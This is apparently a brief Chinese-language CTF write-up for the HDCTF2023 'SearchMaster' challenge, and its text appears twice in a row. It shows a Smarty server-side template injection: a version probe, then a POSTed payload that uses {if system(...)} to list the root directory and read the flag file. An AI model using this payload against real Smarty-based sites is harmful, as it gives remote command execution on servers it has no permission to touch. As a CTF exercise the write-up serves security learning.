HDCTF2023-SearchMaster-wp
页面提示 模板都一样我很抱歉OVO BUT YOU CAN POST ME A data
post data对应回显
1 | data=1 1; |
{$smarty.version}可以看到smarty的版本号
两种方式实现代码执行
1 | data={if system('ls /;cat /flag_13_searchmaster')}{/if} # 法一 |
页面提示 模板都一样我很抱歉OVO BUT YOU CAN POST ME A data
post data对应回显
1 | data=1 1; |
{$smarty.version}可以看到smarty的版本号
两种方式实现代码执行
1 | data={if system('ls /;cat /flag_13_searchmaster')}{/if} # 法一 |